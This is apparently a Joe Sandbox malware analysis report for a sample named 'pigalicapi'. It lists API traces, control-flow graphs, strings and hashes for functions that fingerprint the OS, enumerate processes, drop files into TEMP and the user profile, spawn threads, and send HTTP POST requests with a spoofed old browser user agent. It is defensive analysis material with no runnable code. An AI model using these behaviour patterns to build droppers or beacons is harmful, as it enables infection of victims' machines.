                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1318000056-0
                                                                                                                                                                                                                                                          • Opcode ID: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                                                                                          • Instruction ID: bc84ae2e7c2540528023b92330fd756141af8ab885f3c5e372b57c4b6905bd8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D313EB5E01209EFCF04CF98C595BEEB7B5EF58304F148169E909A7350D7359A81CB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 204 a18f80-a18f94 205 a1927b-a19281 204->205 206 a18f9a-a18f9e 204->206 206->205 207 a18fa4-a18fa8 206->207 207->205 208 a18fae-a18fff call a17d20 * 3 GetVersionExA 207->208 215 a19005-a19016 GetSystemInfo 208->215 216 a19266-a1926a 208->216 217 a19115-a1911c 215->217 218 a1901c-a19023 215->218 216->205 219 a1926c-a19275 lstrcatA 216->219 220 a19210-a19217 call a19290 217->220 221 a19122-a19129 217->221 222 a19042-a19049 218->222 223 a19025-a1903d lstrcatA 218->223 219->205 239 a19219-a19222 lstrcatA 220->239 240 a19228-a19237 lstrlenA 220->240 224 a19174-a1917b 221->224 225 a1912b-a19132 221->225 228 a19068-a1906f 222->228 229 a1904b-a19063 lstrcatA 222->229 227 a19110 223->227 234 a191c3-a191ca 224->234 235 a1917d-a19184 224->235 230 a19134-a1914c lstrcatA 225->230 231 a1914e-a19155 225->231 227->220 228->227 233 a19075-a1907c 228->233 229->227 237 a1916f 230->237 231->237 238 a19157-a19169 lstrcatA 231->238 241 a190a1-a190ab GetSystemMetrics 233->241 242 a1907e-a19085 233->242 234->220 236 a191cc-a191d3 234->236 243 a191a0-a191a7 235->243 244 a19186-a1919e lstrcatA 235->244 247 a191d5-a191ed lstrcatA 236->247 248 a191ef-a191f6 236->248 237->220 238->237 239->240 249 a19259-a19263 lstrlenA 240->249 250 a19239-a19253 lstrcatA * 2 240->250 252 a190c7-a190d1 GetSystemMetrics 241->252 253 a190ad-a190c5 lstrcatA 241->253 242->241 251 a19087-a1909f lstrcatA 242->251 245 a191c1 243->245 246 a191a9-a191bb lstrcatA 243->246 244->245 245->220 246->245 247->220 248->220 256 a191f8-a1920a lstrcatA 248->256 249->216 250->249 251->227 254 a190d3-a190eb lstrcatA 252->254 255 a190ed-a190f6 252->255 253->227 254->227 255->227 257 a190f8-a1910a lstrcatA 255->257 256->220 257->227
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 00A18FF7
                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 00A19009
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win2K), ref: 00A1902E
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinXP), ref: 00A19054
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Vista), ref: 00A1913D
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 00A19160
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 00A1918F
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win7), ref: 00A191B2
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 00A191DE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win8), ref: 00A19201
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,_x64), ref: 00A19222
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00A1922F
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00A1C980), ref: 00A19242
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 00A19253
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A1925D
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 00A19275
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                          • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                          • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                          • Opcode ID: 70a7be5b6e9ab65742b83da0eaa128e9da04685047f80f6e6618ef4147919744
                                                                                                                                                                                                                                                          • Instruction ID: ff718059ee9f1d94a11568321529445d05a60533a71fcd650a5d9be9c26b528a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70a7be5b6e9ab65742b83da0eaa128e9da04685047f80f6e6618ef4147919744
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4812A74A80319FBDB20DFA0CC69BEE7B75BB09711F008A45F905AA280D775DAC1CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 298 a162b0-a162c4 299 a162ca-a162ce 298->299 300 a16c4e 298->300 299->300 301 a162d4-a162e0 299->301 302 a16c51-a16c54 300->302 301->300 303 a162e6-a162ed 301->303 303->300 304 a162f3-a16314 303->304 306 a1631a-a1631e 304->306 307 a1642e-a16453 304->307 309 a16320-a1633a 306->309 310 a16343-a16363 306->310 311 a16459-a1645d 307->311 312 a16c2f-a16c36 307->312 309->310 313 a1633c-a1633e 309->313 314 a16429 310->314 315 a16369-a16375 310->315 316 a16482-a164a2 311->316 317 a1645f-a16479 311->317 318 a16c44 312->318 319 a16c38-a16c42 312->319 313->302 314->307 315->314 320 a1637b-a16384 315->320 322 a165f3-a165fc 316->322 323 a164a8-a164b4 316->323 317->316 324 a1647b-a1647d 317->324 318->300 319->300 320->314 321 a1638a-a16393 320->321 321->314 325 a16399-a163a2 321->325 327 a16603-a1660f 322->327 328 a165fe 322->328 323->322 326 a164ba-a1654c GetEnvironmentVariableA call a17d20 call a19730 GetTickCount GetTempFileNameA CreateFileA 323->326 324->302 329 a16410-a16424 call a11ee0 325->329 330 a163a4-a163ca VirtualAlloc 325->330 326->322 358 a16552-a16586 WriteFile 326->358 332 a16615-a16621 327->332 333 a16bdd-a16be9 327->333 328->328 345 a16427 329->345 334 a163cc-a163e4 call a16260 330->334 335 a1640e 330->335 332->333 340 a16627-a16640 call a17250 332->340 336 a16c18-a16c24 333->336 337 a16beb-a16bf7 333->337 355 a163e6-a163fa call a11ee0 334->355 356 a163fd-a16408 VirtualFree 334->356 335->345 343 a16c26 336->343 344 a16c2a 336->344 337->336 342 a16bf9-a16c16 call a1a360 337->342 353 a16642 340->353 354 a16647-a1664e 340->354 342->344 343->344 344->344 345->307 353->354 359 a16752-a1675b 354->359 360 a16654-a16674 VirtualAlloc 354->360 355->356 356->335 362 a16588-a16591 358->362 363 a165dd-a165e4 358->363 367 a16761-a16788 359->367 368 a169ba-a16a49 GetEnvironmentVariableA call a17d20 call a19730 GetTickCount GetTempFileNameA CreateFileA 359->368 360->359 364 a1667a-a16747 call a17b70 call a197a0 CreateThread CloseHandle 360->364 362->363 369 a16593-a165c7 CloseHandle call a16c60 call a11e60 362->369 363->322 365 a165e6-a165ed CloseHandle 363->365 364->359 365->322 373 a16858-a16864 call a12070 367->373 374 a1678e-a167c0 VirtualAlloc 367->374 397 a16bd6 368->397 398 a16a4f-a16a75 368->398 395 a165c9-a165d0 call a174a0 ExitProcess 369->395 396 a165d8 369->396 384 a1686a-a16871 373->384 379 a16856 374->379 380 a167c6-a167e7 call a16260 374->380 379->384 393 a16842-a16850 VirtualFree 380->393 394 a167e9-a16807 call a12070 380->394 391 a169b0 384->391 392 a16877-a1687e 384->392 391->368 399 a16880-a16891 call a173c0 392->399 400 a16894-a1689d 392->400 393->379 394->393 420 a16809-a1683a VirtualAlloc call a17b70 394->420 396->363 405 a165d8 call a16cf0 396->405 397->333 406 a16a7b-a16aad VirtualAlloc 398->406 407 a16b1e-a16b3c WriteFile 398->407 399->400 402 a168a3-a168c8 call a197a0 400->402 403 a1698a-a16993 400->403 426 a168e9-a1690d VirtualAlloc 402->426 427 a168ca-a168e7 402->427 416 a16995-a169a6 call a12510 403->416 417 a169a9 403->417 405->363 414 a16b1c 406->414 415 a16aaf-a16ad0 call a16260 406->415 410 a16b42-a16b49 407->410 418 a16bc9-a16bd0 CloseHandle 410->418 419 a16b4b-a16b57 410->419 414->410 434 a16ad2-a16b02 WriteFile 415->434 435 a16b08-a16b16 VirtualFree 415->435 416->417 417->391 418->397 419->418 424 a16b59-a16b82 CloseHandle call a11e60 419->424 431 a1683f 420->431 439 a16b84-a16b8b 424->439 440 a16bc7 424->440 432 a16934-a1693d 426->432 433 a1690f-a16931 call a17b70 426->433 427->432 431->393 432->403 438 a1693f-a16984 CreateThread CloseHandle 432->438 433->432 434->435 435->414 438->403 442 a16ba1-a16baa 439->442 443 a16b8d-a16b9e call a173c0 439->443 440->397 445 a16bc0 442->445 446 a16bac-a16bbd call a12510 442->446 443->442 445->440 446->445
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00A163BD
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 00A16408
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                          • String ID: Balucergobw$TEMP$TEMP
                                                                                                                                                                                                                                                          • API String ID: 2087232378-2855258202
                                                                                                                                                                                                                                                          • Opcode ID: a556bd63c38d4e1296452d7ef43a9bff0265b7e3e8e976114b42384e3aff2b0b
                                                                                                                                                                                                                                                          • Instruction ID: 1ef05e0733d7d9dcdcff54342d4d378ba01cbed2781d7e20cb2803a3b15b829d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a556bd63c38d4e1296452d7ef43a9bff0265b7e3e8e976114b42384e3aff2b0b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F5238B5A04218EFDB24DF94DD89FEEB7B5BB48300F148598E509AB291D770AE81CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 450 a11840-a11854 451 a11c95-a11c9b 450->451 452 a1185a-a1185e 450->452 452->451 453 a11864-a11868 452->453 453->451 454 a1186e-a11872 453->454 454->451 455 a11878-a1190a call a17d20 InternetCrackUrlA 454->455 455->451 458 a11910-a11930 InternetOpenA 455->458 458->451 459 a11936-a11969 InternetConnectA 458->459 460 a11c88-a11c8f InternetCloseHandle 459->460 461 a1196f-a119a7 HttpOpenRequestA 459->461 460->451 462 a11c7b-a11c82 InternetCloseHandle 461->462 463 a119ad-a119e5 wnsprintfA HttpAddRequestHeadersA 461->463 462->460 464 a119eb-a119f9 463->464 465 a11c6e-a11c75 InternetCloseHandle 463->465 466 a11a04-a11a26 InternetSetOptionA 464->466 467 a119fb-a119fe 464->467 465->462 468 a11a30-a11a75 call a17d20 HttpSendRequestA 466->468 467->466 471 a11a7b-a11aa1 HttpQueryInfoA 468->471 472 a11c4c-a11c5f 468->472 474 a11aa3-a11abc call a17dd0 471->474 475 a11ac9-a11b0f call a17d20 HttpQueryInfoA 471->475 472->465 473 a11c61-a11c68 472->473 473->465 473->468 474->475 480 a11abe-a11ac7 474->480 481 a11b11-a11b2d call a17dd0 475->481 482 a11b47-a11b6a VirtualAlloc 475->482 480->475 481->482 489 a11b2f-a11b39 481->489 484 a11b70-a11b93 482->484 485 a11c19 482->485 487 a11b99-a11bc9 InternetReadFile 484->487 488 a11c23-a11c4a InternetReadFile 485->488 490 a11bdb-a11be2 487->490 491 a11bcb-a11bd9 487->491 488->472 488->488 489->482 492 a11b3b-a11b41 489->492 493 a11be4 490->493 494 a11be6-a11c11 490->494 491->490 492->482 495 a11c17 493->495 496 a11c13 494->496 497 a11c15 494->497 495->472 496->495 497->487
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 00A11902
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 00A1191D
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A11956
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,*/*,00200300,00000000), ref: 00A11994
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 00A119C2
                                                                                                                                                                                                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 00A119DD
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 00A11A16
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A11A6D
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A11A99
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 00A11B07
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 00A11B57
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 00A11BBF
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00A11C3D
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00A11C75
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00A11C82
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00A11C8F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                          • String ID: */*$0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                          • API String ID: 880997049-2033563659
                                                                                                                                                                                                                                                          • Opcode ID: f9396da5b491ec18199116deef3c31c42ab8010757eab4a62a2fb58196b9e4e4
                                                                                                                                                                                                                                                          • Instruction ID: 7ad5f08ff7603f73f9e2d3ea7d3186858088b8ccc242b0487a4e172c077993bc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9396da5b491ec18199116deef3c31c42ab8010757eab4a62a2fb58196b9e4e4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77C11EB1D84218AFEB24CF50CC49BE9B7B5EB48714F0081D9E60DA6280DBB66ED5CF54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00A14066
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A1407A
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 00A140AF
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A140C6
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 00A140E6
                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 00A140F7
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00A14101
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00A14AC0,00000000,00000000,00000000), ref: 00A14118
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A141DD
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00A14BA0,?,00000000,00000000), ref: 00A141F7
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A1420C
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 00A14216
                                                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00A1422D
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00A1423C
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A14258
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 00A1426D
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00A14277
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A1428E
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00A142A6
                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 00A142D1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1593741596-0
                                                                                                                                                                                                                                                          • Opcode ID: a47add22e2e3f74288eba6cf168862befaf63fc0d559b7f9de7ad6142373aa45
                                                                                                                                                                                                                                                          • Instruction ID: a1c924202f56f35afb8f137e9098f85206dfad937c0defdd5ddd4118bf56a4d9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a47add22e2e3f74288eba6cf168862befaf63fc0d559b7f9de7ad6142373aa45
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F59106B4984308EFDB14DFE8D889BEDBBB5BB48715F108219FA05AB280D7749985CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00A18F80: GetVersionExA.KERNEL32(0000009C), ref: 00A18FF7
                                                                                                                                                                                                                                                            • Part of subcall function 00A18F80: GetSystemInfo.KERNEL32(?), ref: 00A19009
                                                                                                                                                                                                                                                            • Part of subcall function 00A18F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 00A1902E
                                                                                                                                                                                                                                                            • Part of subcall function 00A18F80: lstrcatA.KERNEL32(00000000,_x64), ref: 00A19222
                                                                                                                                                                                                                                                            • Part of subcall function 00A18F80: lstrlenA.KERNEL32(?), ref: 00A1922F
                                                                                                                                                                                                                                                            • Part of subcall function 00A18F80: lstrcatA.KERNEL32(00000000,00A1C980), ref: 00A19242
                                                                                                                                                                                                                                                            • Part of subcall function 00A18F80: lstrcatA.KERNEL32(00000000,?), ref: 00A19253
                                                                                                                                                                                                                                                            • Part of subcall function 00A18F80: lstrlenA.KERNEL32(00000000), ref: 00A1925D
                                                                                                                                                                                                                                                            • Part of subcall function 00A18F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 00A19275
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 00A15742
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A11CB1
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: Process32First.KERNEL32(000000FF,00000128), ref: 00A11CE1
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: GetCurrentProcessId.KERNEL32 ref: 00A11CEE
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: Process32First.KERNEL32(000000FF,00000128), ref: 00A11D52
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: lstrlenA.KERNEL32(?,000000FF,00000128), ref: 00A11D78
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 00A11D92
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A11DA6
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 00A11DDC
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,00A1575B,00000000,?,00000004,00000000), ref: 00A11DFB
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,00A1575B,00000000,?,00000004,00000000), ref: 00A11E21
                                                                                                                                                                                                                                                            • Part of subcall function 00A11CA0: CloseHandle.KERNEL32(000000FF), ref: 00A11E4B
                                                                                                                                                                                                                                                            • Part of subcall function 00A19D20: GetSystemDirectoryA.KERNEL32(?,00000103), ref: 00A19D9A
                                                                                                                                                                                                                                                            • Part of subcall function 00A19D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 00A19DDD
                                                                                                                                                                                                                                                            • Part of subcall function 00A19D20: StringFromCLSID.OLE32(00000020,?), ref: 00A19EF7
                                                                                                                                                                                                                                                            • Part of subcall function 00A15CD0: lstrlenA.KERNEL32(00000000), ref: 00A15CEB
                                                                                                                                                                                                                                                            • Part of subcall function 00A15CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A15D10
                                                                                                                                                                                                                                                            • Part of subcall function 00A15CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 00A15D29
                                                                                                                                                                                                                                                            • Part of subcall function 00A15CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A15D45
                                                                                                                                                                                                                                                            • Part of subcall function 00A15CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00A15D6D
                                                                                                                                                                                                                                                            • Part of subcall function 00A15CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A15D99
                                                                                                                                                                                                                                                            • Part of subcall function 00A15CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00A15DA3
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 00A157B8
                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 00A157F1
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 00A1580A
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 00A1582F
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A15854
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00A1586D
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A15896
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00A158D0
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A15912
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00A1591C
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$lstrcat$CloseVirtuallstrlen$ChangeCreateFindNotificationProcess$AllocDirectoryFirstFreeModuleNameProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromHandleInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                          • API String ID: 1116761331-4090404022
                                                                                                                                                                                                                                                          • Opcode ID: 9573fe0f8d192d307907a80c85b89fb7b622b98925a41af05ce218ae0ac47402
                                                                                                                                                                                                                                                          • Instruction ID: a1d755e6ce4e908c35bf75e68f3044ec02c0371912dcbd1b72a1bd439775c246
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9573fe0f8d192d307907a80c85b89fb7b622b98925a41af05ce218ae0ac47402
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 605195B0980208FBDB14DFA4DC99FEE7735AB48715F048154F6096A2C2D778AB85CF94
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 00A19A0A
                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00A19A11
                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00A19A3A
                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 00A19A77
                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 00A19AAD
                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?,00000000), ref: 00A19AC3
                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 00A19AE6
                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?), ref: 00A19AFC
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00A19B7A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
